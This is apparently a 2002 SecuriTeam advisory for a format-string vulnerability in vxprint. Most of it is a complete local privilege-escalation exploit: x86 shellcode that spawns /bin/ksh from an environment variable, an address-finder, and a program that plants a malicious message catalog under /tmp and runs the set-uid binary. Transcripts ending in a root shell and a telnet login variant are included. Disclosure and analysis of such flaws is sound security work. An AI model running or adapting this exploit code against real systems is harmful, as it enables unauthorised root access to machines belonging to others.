[EXPL] Format String Vulnerability in VXPrint Allows Gaining of Arbitrary Privileges

From: support@securiteam.com
Date: 02/13/02


From: support@securiteam.com
To: list@securiteam.com
Date: Wed, 13 Feb 2002 08:35:06 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Format String Vulnerability in VXPrint Allows Gaining of Arbitrary
Privileges
------------------------------------------------------------------------

SUMMARY

vxprint displays records from the Volume Manager (VxVM) configuration and runs with elevated privileges (the transcripts below end in a uid=0 root shell). Because it formats messages taken from a message catalog whose location an unprivileged user can choose through the LC_MESSAGES environment variable, a local attacker can plant a catalog containing format directives, exploit the resulting format-string vulnerability and execute arbitrary code as root. The affected platform is not named in the advisory; the exploit relies on mkmsgs(1) and SVR4-style message catalogs.

DETAILS

How the exploit works (as far as the code below shows it): vxprint takes its messages from the catalog vxvm.mesg in the directory named by the LC_MESSAGES environment variable, which an unprivileged user can point at /tmp, and the looked-up text is evidently passed to a printf-style function as the format string itself. fmt_exp.c therefore uses mkmsgs(1) to build a catalog in which every entry is nineteen "%10x" directives (each consumes one stack word) followed by "%<width>x%n", with width = ret-address - BASE + offset, so that the "%n" stores the chosen value -- the address of the payload exported as EGG, as printed by getret -- presumably over a saved return address. The huge field width is also why the steps below take so long to complete.

Example:
$ gcc -o expshell expshell.c
$ gcc -o getret getret.c
$ gcc -o fmt_exp fmt_exp.c
$ ./expshell            (starts a tcsh with EGG and LC_MESSAGES=/tmp exported; the commands below run inside it)
$ ./getret
e=8047af7
$ ./fmt_exp 0x8047af7 16    (16 is the optional offset added to the address; see fmt_exp.c)
.......... (wait 30 minutes -- each catalog entry makes vxprint pad to a field width of roughly ret-address minus BASE characters before the %n store, which is presumably why so much output, and time, is consumed first) ......

# id
uid=0(root) gid=3(sys) ......................

Example (telnet variant: the client is told to export LC_MESSAGES=/tmp into the remote login session, so a privileged program run during login presumably reads the catalog already planted at /tmp/LC_MESSAGES/vxvm.mesg by fmt_exp):
$ telnet
telnet> env def LC_MESSAGES /tmp
telnet> o localhost
Trying....
....
login: blah blah..
password: blah.. blah..
..... (wait 30 minutes.. )
#

Exploit code:
------------------ expshell.c ------------------
#include <stdio.h>
#include <stdlib.h>

/*
 * Payload exported as the EGG environment variable by main() below; getret
 * prints its address and fmt_exp aims the %n write at it.
 *
 * Layout: 23 lines of 12 NOPs (0x90) form a sled so that an imprecise
 * landing still reaches the stub, followed by a short x86 stub (annotated
 * inline) that ends in the literal "/bin/ksh". The leading jmp targets the
 * call at the end of the stub; that call jumps back to <shellcode+2> while
 * pushing the address of the string that follows it, which the popl %eax
 * at <shellcode+4> then retrieves -- the usual way of locating trailing
 * data without knowing an absolute address. The array contains no 0x00
 * byte, so it survives the sprintf()/putenv() copy as a C string.
 */
char shellcode[]=
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\xeb\x1a" /* jmp <shellcode+28>: forward to the call at the end of the stub */
    "\x33\xd2" /* xorl %edx,%edx */
    "\x58" /* popl %eax: address of "/bin/ksh", pushed by the call below */
    "\x8d\x78\x14" /* leal 0x14(%eax),%edi */
    "\x57" /* pushl %edi */
    "\x50" /* pushl %eax */
    "\xab" /* stosl %eax,%es:(%edi) */
    "\x92" /* xchgl %eax,%edx */
    "\xab" /* stosl %eax,%es:(%edi) */
    "\x88\x42\x08" /* movb %al,0x8(%edx) */
    "\x83\xef\x3b" /* subl $0x3b,%edi */
    "\xb0\x9a" /* movb $0x9a,%al */
    "\xab" /* stosl %eax,%es:(%edi) */
    "\x47" /* incl %edi */
    "\xb0\x07" /* movb $0x07,%al */
    "\xab" /* stosl %eax,%es:(%edi) */
    "\xb0\x0b" /* movb $0x0b,%al */
    "\xe8\xe1\xff\xff\xff" /* call <shellcode+2>: pushes the address of the string that follows */
    "/bin/ksh"
;

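/*
 * Export the payload as EGG and force LC_MESSAGES=/tmp, then drop into a
 * tcsh from which getret and fmt_exp are run (see the transcript above).
 *
 * Returns 1 if the environment could not be set up or the shell could not
 * be started, 0 otherwise. argc/argv are not used.
 */
int main(void)
{
   /* putenv() keeps a pointer to this buffer rather than copying it, so it
      must not be an automatic that could go out of scope. */
   static char buff[1024];
   int len;

   len = snprintf(buff, sizeof buff, "EGG=%s", shellcode);
   if (len < 0 || (size_t)len >= sizeof buff) {
      printf("payload does not fit in the EGG buffer\n");
      return 1;
   }

   if (putenv(buff) != 0 || putenv("LC_MESSAGES=/tmp") != 0) {
      printf("putenv failed\n");
      return 1;
   }

   if (system("/usr/bin/tcsh") == -1) {
      printf("could not start /usr/bin/tcsh\n");
      return 1;
   }
   return 0;
}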
---------------------------------------------------------------

---------------- getret.c --------------------
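/*
 * Print the address at which the value of the EGG environment variable
 * (the payload exported by expshell.c) lives; fmt_exp takes this number
 * as its ret-address argument.
 *
 * NOTE(review): this file has no #include lines, so printf() and getenv()
 * are implicitly declared -- add <stdio.h> and <stdlib.h>.
 *
 * Returns 1 if EGG is not set, 0 otherwise.
 */
int main(void)
{
   char *egg = getenv("EGG");

   if (egg == NULL) {
      printf("EGG is not set; run expshell first\n");
      return 1;
   }
   printf("e=%p\n", (void *)egg);
   return 0;
}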
-----------------------------------------------

---------------- fmt_exp.c -----------------------------
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#include "shellcode.h"

/* Subtracted from the target value when main() computes the "%x" field width
 * that precedes the "%n" store. The author gives 0x20c7c (134268) as
 * vxprint's base address, i.e. the part of the count that is already
 * accounted for before the "%n" is reached.
 * NOTE(review): how this number relates to the format string's return
 * address is not spelled out here -- verify against the target binary
 * before reusing it. */
#define BASE 134268

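/*
 * Build and install a message catalog whose entries are format strings,
 * then exec vxprint so that it reads them.
 *
 *   argv[1]  target value in hex (the EGG address printed by getret)
 *   argv[2]  optional decimal offset added to that value (default 0)
 *
 * Each of the 700 catalog entries is nineteen "%10x" directives (each one
 * consumes a stack word) followed by "%<width>x%n", where
 * width = argv[1] - BASE + argv[2]; the "%n" then stores the intended value.
 * The catalog is compiled with mkmsgs(1) into ./testout and moved to
 * /tmp/LC_MESSAGES/vxvm.mesg, which vxprint picks up when LC_MESSAGES=/tmp
 * (set by expshell). Returns 1 on bad arguments or any setup failure; on
 * success execl() replaces this process and does not return.
 */
int main(int argc, char *argv[])
{
   const int line = 700;   /* catalog entries */
   const int n = 19;       /* stack-walking "%10x" directives per entry */
   char *retaddr, *end;
   long g_len, offset = 0;
   FILE *fp;

   if (argc < 2 || argc > 3) {
      printf("Usage: %s ret-address offset\n", argv[0]);
      return 1;
   }

   retaddr = argv[1];
   if (argc == 3) {
      offset = strtol(argv[2], &end, 10);
      if (end == argv[2] || *end != '\0') {
         printf("bad offset: %s\n", argv[2]);
         return 1;
      }
   }

   g_len = strtol(retaddr, &end, 16);
   if (end == retaddr || *end != '\0') {
      printf("bad ret-address: %s\n", retaddr);
      return 1;
   }
   g_len -= BASE;
   g_len += offset;
   /* A non-positive width cannot produce the intended "%n" count. */
   if (g_len <= 0) {
      printf("computed width %ld is not positive; check ret-address/offset\n", g_len);
      return 1;
   }

   fp = fopen("testdef", "w");
   if (fp == NULL) {
      fprintf(stderr, "can not open file.\n");
      return 1;
   }
   for (int i = 0; i < line; i++) {
      for (int j = 0; j < n; j++)
         fputs("%10x", fp);
      fprintf(fp, "%%%ldx%%n\n", g_len);   /* %ld: g_len is a long */
   }
   if (fclose(fp) != 0) {
      fprintf(stderr, "write to testdef failed.\n");
      return 1;
   }

   remove("testout");   /* may not exist yet; failure is harmless */
   if (system("mkmsgs testdef testout") != 0) {
      fprintf(stderr, "mkmsgs failed.\n");
      return 1;
   }
   /* Directory may already exist; a real failure shows up in the mv below. */
   mkdir("/tmp/LC_MESSAGES", 0755);
   if (system("mv testout /tmp/LC_MESSAGES/vxvm.mesg") != 0) {
      fprintf(stderr, "could not install catalog.\n");
      return 1;
   }

   printf("ret addr = 0x%lx\n", g_len);
   /* vxprint is the target here; the author notes that any other set-uid
      command using the same catalog could be substituted. The list must be
      terminated with a (char *) null pointer, not a bare NULL. */
   execl("/usr/sbin/vxprint", "vxprint", "---", (char *)NULL);
   perror("execl /usr/sbin/vxprint");
   return 1;
}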

ADDITIONAL INFORMATION

The information has been provided by <mailto:jggm@mail.com> jGgM.


DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


